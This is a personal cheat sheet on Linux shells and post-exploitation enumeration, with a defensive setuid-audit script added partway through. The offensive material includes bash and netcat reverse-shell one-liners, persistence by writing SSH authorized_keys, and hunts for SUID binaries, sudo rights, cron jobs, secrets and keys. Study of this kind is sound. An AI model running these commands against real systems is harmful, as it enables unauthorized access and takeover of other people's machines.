Shell
Disclaimer: These are my personal notes, published "as-is"
without warranty or guarantee of any kind. Use at your own risk. Licensed
CC BY-NC-SA 4.0.
Establish a shell #
Check PayloadsAllTheThings for commands.
Shell commands #
Can be run from a script, e.g. a git hook. May need a shebang line, e.g. #!/bin/sh
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f
Got a shell #
First commands to set up terminal #
python -c 'import pty; pty.spawn("/bin/bash")'
OR
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z (send the shell to the background), then:
stty raw -echo ; fg ; reset
stty columns 200 rows 200
SSH session - authorized_keys #
mkdir -p .ssh
echo 'KEYHERE' | tee .ssh/authorized_keys
Check capabilities #
which gcc
which cc
which python
which perl
which wget
which curl
which nc
which ncat
Check arch #
file /bin/bash
uname -a
cat /etc/issue
cat /etc/*-release
User info #
sudo -l
ls -lsaht /etc/sudoers
groups <user>
env
cd /home
ls -lsaht
ls -lsaR /home/ # Looking for .ssh keys
Check web dir #
cd /var/www/html
ls -lsaht
SUID / SGID escalations #
Find SUID #
find / -perm -u=s -type f 2>/dev/null
Find SGID #
find / -perm -g=s -type f 2>/dev/null
Extended capabilities #
getcap, setcap and file capabilities — insecure.ws
getcap -r / 2>/dev/null
Commands with capabilities may still be restricted by AppArmor; check with ls /etc/apparmor.d/
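The SUID/SGID and capability checks above are the attacker's view; the same inventory, snapshotted on a known-good host and diffed later, is a cheap detection for a new setuid binary or file capability appearing. This is an added example, not from the original notes; it assumes POSIX find/comm/sort and, optionally, getcap from libcap (the function and baseline file names are mine).

```shell
#!/bin/sh
# Added example, not from the original notes: inventory setuid/setgid files and
# file capabilities under a tree and report what has appeared since a baseline.
# Assumes POSIX find/comm/sort and, optionally, getcap from libcap (silently
# skipped if it is not installed).

# Print "suid PATH" / "sgid PATH" lines for files under $1.
# -perm -4000 and -perm -2000 are the POSIX octal forms of -u=s and -g=s.
list_suid_sgid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sed 's/^/suid /'
    find "$1" -type f -perm -2000 -print 2>/dev/null | sed 's/^/sgid /'
}

# Print "cap PATH caps" lines from getcap -r, or nothing without libcap tools.
list_file_caps() {
    command -v getcap >/dev/null 2>&1 || return 0
    getcap -r "$1" 2>/dev/null | sed 's/^/cap /'
}

# Write the sorted inventory of tree $1 to baseline file $2.
write_baseline() {
    { list_suid_sgid "$1"; list_file_caps "$1"; } | sort > "$2"
}

# Print entries present under tree $1 now but missing from baseline $2.
# Returns 1 when something new appeared, 0 when the inventory is unchanged.
report_new() {
    _now=$(mktemp)
    write_baseline "$1" "$_now"
    # comm -13: lines only in the second (current) file; both inputs are sorted.
    _added=$(comm -13 "$2" "$_now")
    rm -f "$_now"
    [ -z "$_added" ] && return 0
    printf '%s\n' "$_added"
    return 1
}

# Usage: sh suid-audit.sh baseline DIR FILE   (on a known-good host)
#        sh suid-audit.sh check DIR FILE      (later, e.g. from cron)
if [ $# -eq 3 ]; then
    case $1 in
        baseline) write_baseline "$2" "$3" ;;
        check)    report_new "$2" "$3" ;;
    esac
fi
```

Run the check from cron with / as DIR; a non-zero exit with output is the alert condition.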
Process spying #
- Is there some script doing things that might be interesting?
- Shows what’s recently run.
- Keep it running to see if there are any periodic scripts.
https://github.com/DominicBreuker/pspy/blob/master/README.md
cd /var/tmp/
Transfer pspy
chmod 755 pspy
./pspy
Local network #
netstat -antup
netstat -tunlp
Root running anything? #
ps aux |grep -i 'root' --color=auto
Any interesting files? #
ls -lsaht /etc/
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
Anything other than root / shadow here?
cat /etc/fstab
Any config files left behind? #
ls -lsaht |grep -i '\.conf' --color=auto
ls -lsaht |grep -i '\.secret' --color=auto
Cron #
crontab -u root -l
cat /etc/crontab
ls /etc/cron.*
List all files #
Find all files created by a user:
find / -user miguel 2>/dev/null
Any mail? #
cd /var/mail/
ls -lsaht
Automated scripts #
- LinPEAS
- Traitor
searchsploit -m multiple/local/4713.sh
mirrors (copies) the specified exploit into the current directory.